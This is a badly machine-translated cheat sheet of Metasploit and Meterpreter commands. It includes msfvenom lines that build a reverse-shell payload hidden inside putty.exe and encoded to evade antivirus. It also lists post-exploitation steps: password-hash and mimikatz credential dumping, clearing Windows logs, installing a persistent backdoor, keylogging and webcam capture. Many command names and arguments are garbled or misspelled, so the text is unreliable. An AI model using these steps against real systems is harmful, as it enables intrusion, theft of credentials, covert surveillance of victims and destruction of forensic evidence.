Some of the commands commonly used by Metasploit come from their own understanding of official documents.

Msfconsolecommand

Back to exit the current module

Banner display an MSF image

Check checks to see if the current target supports the exploits

Show options shows the current exploites option

Connect Remote connection ip+ port

Edit opens the current exploits in vim and then edits

Exit Msfconsole Environment

grep, like grep in Linux, crawls flag,eg:grep http search Oracle from the target

Info Displays the details of the current exploits

IRB enters a ruby interactive shell that dynamically interacts and creates Metasploit scripts

Jobs-h working on the current operation

Kill+jobid to terminate a job with job ID

Load loads some plugins from the Metasploit plug-in library

LoadPath add some third-party plugins to Metasploit through path

Unload Uninstall

Resource loads some of the source code and runs it through Msfconsole, and can also be used to execute some batch scripts

Route Add routing Feature

Search for some modules you want to know or exploit or

Help Search to see search assistance

Search Name: keyword searching by name

Search platform: Narrow the scope of your searches with the platform

Search Type: Narrow the range by type, such as Auxiliary,post,exploit,etc

Search Author: Searching by your favorite author

Search Name:author:platform: Multiple options to narrow the range when searching

Session Management Session-l can make a list

The Session-i ID can connect to the session with the ID and an interactive shell appears

Set is the current module Oh, option and parameters.

unset removing the parameters of its own configuration

SETG/UNSETG setting/Removing global variables, creating a global variable can save you time

Save saves the current configuration and properties

Auxiliary auxiliary Module (scanner,denial of service modules,fuzzers)

Exploits attack module, the core of Metasploit, preserves a variety of vulnerabilities

Payloads payload

In the utilization module, show targets shows which targets are supported

Show advanced Options

Show Nops shows the NOP generator provided by Metasploit

PAYLOADSMSF payloads

Stager establishes a communication channel between the attacker and the victim to read the remote host in a phase payload

Meterpreter through DLL injection operations, completely reside in memory, not on the hard disk left traces so traditional forensics difficult to find

The Passivex can help bypass the restricted outbound firewall. It does this by creating a hidden instance of Internet Explorer by using an ActiveX control. By using the new ActiveX control, it communicates with the attacker through HTTP requests and responses.

Nonx is used to circumvent DEP and has DEP on some CPUs to prevent code from running in some areas of memory

The reflective DLL injection the reflection DLL injection, injecting the phase payload into the in-memory running host process without touching the host hard disk. Both VNC and Meterpreter use a reflective DLL injection

Generating payloads

To generate shellcode without any command, you only need to use generate directly.

Use Generate-b '/x00/' to remove empty characters, effectively reducing the size of shellcode

Meterpreterusing Meterpreter Commands

Background switching between Meterpreter and MSF

Clearev clears the app information and security log from the Windows system. No options and parameters

Download Download remote files, when downloading files under Windows System, note the double slash

Edit opens the file with VI and edits

Execute opens a command line on the destination machine. Execute-f Cmd.exe-i-H

Getuid display of users running on Meterpreter server

Hashdump dumping data for Sam databases

Idletime Display the user's idle time on the remote machine

Lpwd shows the running path of the current Meterpreter

The LCD switches your working directory directly in the Meterpreter, making it possible to directly access the files of the destination path

PS shows the running processes on the target machine

Search searches the target machine for files, searches the entire system, or makes folders that can be used with wildcards

The shell provides a native shell on the target machine
Upload can upload files or folders to the target machine

Webcam_list run from Meterpretershell to display the available webcam on the target machine

Webcam_snap uses the available webcam of the current target machine to JPEG and save.

Execute execute file on target machine

GETWD gets the working directory of the current target machine, and can also get the working directory of the current system.

Download Download from Target machine or file to attack aircraft

Route View Routes

PROTFWD Meterfreter Embedded Port forwarder

PS viewing process through PS

Migrate +pid can migrate Meterpreter sessions from one process to the memory space of another process. So as long as this process does not end, the Meterpreter session will not be closed.

Python_execute

The following statements are all in the Meterpreter environment

Python_execute +python statements to implement Python usage

Python_execute "Import os; Cd=os.getpwd ()"-R CD. Use-R to print the current variable

Python_import-f +path is used to introduce Python files in Meterpreter, using-F to specify the file

Port Scanning

Rhosts can set IP ranges, CIDR ranges and multiple ranges separated by commas, and host list files separated by rows

THREADS the number of concurrent threads for the scanner defaults to 1, but there are specific rules: keep under 16 on the Win32 system, and under 2001 in Cygwin, the class Linux system can THREADS higher than 256

Db_nmap use Nmap Scan and save the scan results in database

Nmap-oa to run the NMAP scan will generate three output files and then populate the database with Db_import

Search Portscan for the Portscanner available in the MSF framework

Auxiliary/scanner/smb/snb_version can be used to detect the operating system version and hostname on the target machine

AUXILIARY/SCANNER/IP/IPIDSEQ Scan the current network of idle hosts, using the idle host to scan other hosts, using the zombie machine to achieve their own stealth purposes

Use the nmap+ parameter + zombie ip+ destination IP in the IPIDSEQ environment to achieve the purpose of using zombies to initiate NMAP scanning

Using Metasploit to findvnlnerable MSSQL systems (Microsoft SQL Server)

Use auxiliary/scanner/mssql/mssql_ping to set parameters and find out if the surviving MSSQL server can use Auxiliary/admin/mssql/mssql_exec for exploit. You can also use tools like Thc-hydra and Medusa for brute force

Service identification

SSH Service found port (22), FTP service port (21)

Extending Psnuffle

All modules are located in Data/exploits/psnuffle, and the name corresponds to the protocol name used by Psnuffle, usually using regular expressions

SNMP sweeping

There is an SNMP auxiliary module in the Metasploit, and the Metasploit has a built-in auxiliary module dedicated to the clear SNMP device. Need to modify snmpdopts= '-lsd-lf/dev/null-u snmp-i-smux-p/var/run/snmpd.pid 127.0.0.1 in/etc/default/snmpd before execution

127.0.0.1 modifies bit 0.0.0.0, because only local SNMP is scanned by default. Then restart the service

When making SNMP queries, there is a MIB API, the MIB is the management information base, which allows querying devices and extracting information, Metasploit the MIB list in the database is loaded by default

Search SNMP to view the available SNMP scan modules

Writing your own security scanner

Subsequent detailed

Msfvenom

Necessary Options-p and-F

-p Specifies that the payload need to follow the parameters lhost= ... lport=. Wait, look at options.

-f Specifies the output format of the payload

-B will automatically call the encoder

-e using the encoding module

-I followed by the number of iterations to encode multiple times, in some cases the iterative coding can be used to circumvent anti-virus software

Msfvenom–help-formats viewing the output formats supported by MSF

Msfvenom-l Payloads List Payloads list

MSFVENOM-L Encoder Listing encoding methods

Msfvenom-l nops empty field module/to bypass and avoid killing

Bounce back to Meterpreter session payload:

Msfvenom-p windows/meterpreter/reverse_tcp lost= own IP lport=444-f exe-o payload.exe

Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444-a x86--platform windows-e X86/shikata_ga_ Nai-i 3-x/root/Download/putty.exe-k-F exe-o/root/Desktop/putty_evil.exe

Application of Meterpreter in post-infiltration 0x01 privilege elevation

Getudid gets the current user ID Getsystem

0x02 Domain Admins sniffing

Use Post/windows/gather/enum_domain

0x03 Crawl Password

Load Minikatz

Windows/gather/hashdump

0x04 Log Cleanup

Clearev

0x05 Backdoor

Metsvc

Exploit/multi/hander

Payload windows/metsvc_bind_tcp

Persistence self-initiated installation will leave a backdoor and add the boot entry

0x06 Keylogger

Keyscan_start

Keyscan_dump

Keyscan_stop

0x07 Process Injection 0x08 screenshot

Use Espia

Screen

Screenrab

Some of the commands commonly used by Metasploit come from their own understanding of official documents.